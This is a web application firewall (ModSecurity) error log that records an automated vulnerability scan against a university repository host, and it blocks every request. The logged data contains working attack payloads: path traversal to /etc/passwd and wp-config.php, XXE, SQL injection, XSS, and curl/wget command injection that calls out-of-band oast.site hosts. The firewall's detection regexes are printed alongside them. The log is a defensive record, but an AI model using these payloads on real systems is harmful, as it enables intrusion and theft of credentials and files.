[Tue Aug 29 11:41:20.775654 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc4EnQAAAAP"]
[Tue Aug 29 11:41:21.558179 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gp6zuo7h36k8oq.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NecAAAAM"]
[Tue Aug 29 11:41:23.430931 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAUKhFQAAABC"]
[Tue Aug 29 11:41:23.464253 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAc2dRgAAAAN"]
[Tue Aug 29 11:41:24.451165 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAcoNV4AAAAF"]
[Tue Aug 29 11:41:24.471509 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAcoNV8AAAAF"]
[Tue Aug 29 11:41:25.360499 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAc2dSQAAAAN"]
[Tue Aug 29 11:41:25.524284 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAaZ9tIAAAAo"]
[Tue Aug 29 11:41:26.359139 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAQkBc4AAAAC"]
[Tue Aug 29 11:41:26.501345 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAUKhF8AAABC"]
[Tue Aug 29 11:41:26.511699 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc2dTEAAAAN"]
[Tue Aug 29 11:41:26.611270 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAUKhGEAAABC"]
[Tue Aug 29 11:41:27.402802 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQkBdUAAAAC"]
[Tue Aug 29 11:41:28.404224 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g7a4j8t855gnpy.oast.site found within TX:1: cjmnbitjmimt14dgn26g7a4j8t855gnpy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAbo-YYAAAAi"]
[Tue Aug 29 11:41:30.384223 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gx9hj6cjaee8wi.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAbo-YsAAAAi"]
[Tue Aug 29 11:41:30.660049 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAaZ9vEAAAAo"]
[Tue Aug 29 11:41:32.388182 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcrik4AAAAB"]
[Tue Aug 29 11:41:32.613645 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAUKhIUAAABC"]
[Tue Aug 29 11:41:34.367272 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-sCo-f0AAAcoNY8AAAAF"]
[Tue Aug 29 11:41:35.556946 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAXHqC4AAAAT"]
[Tue Aug 29 11:41:36.421682 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAQkBgoAAAAC"]
[Tue Aug 29 11:41:36.574591 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcoNaQAAAAF"]
[Tue Aug 29 11:41:39.395799 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13A8Co-f0AAAXHqEIAAAAT"]
[Tue Aug 29 11:41:39.518989 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAc0NkgAAAAM"]
[Tue Aug 29 11:41:40.419688 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcbSLgAAAAv"]
[Tue Aug 29 11:41:42.775997 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAUKhMYAAABC"]
[Tue Aug 29 11:41:45.609430 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gaurnqhjf9uxi3.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAUKhOgAAABC"]
[Tue Aug 29 11:41:46.452363 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAUKhO4AAABC"]
[Tue Aug 29 11:41:49.377164 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAQSWuYAAAA0"]
[Tue Aug 29 11:41:56.412902 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdECXUAAAAW"]
[Tue Aug 29 11:41:57.353601 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdPLvwAAAAT"]
[Tue Aug 29 11:41:59.825504 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAdPLwsAAAAT"]
